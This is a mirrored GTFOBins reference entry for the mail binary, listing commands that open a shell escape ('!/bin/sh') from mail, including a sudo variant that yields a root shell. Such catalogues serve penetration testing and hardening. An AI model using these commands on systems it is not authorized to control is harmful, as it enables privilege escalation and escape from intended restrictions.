1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-26 09:58:02 +01:00
GTFOBins.github.io/_gtfobins/mail.md
2018-06-17 11:27:03 +01:00

12 lines
179 B
Markdown

---
functions:
execute-interactive:
- code: |
mail -f /etc/hosts
!/bin/sh
sudo-enabled:
- code: |
sudo mail -f /etc/hosts
!/bin/sh
---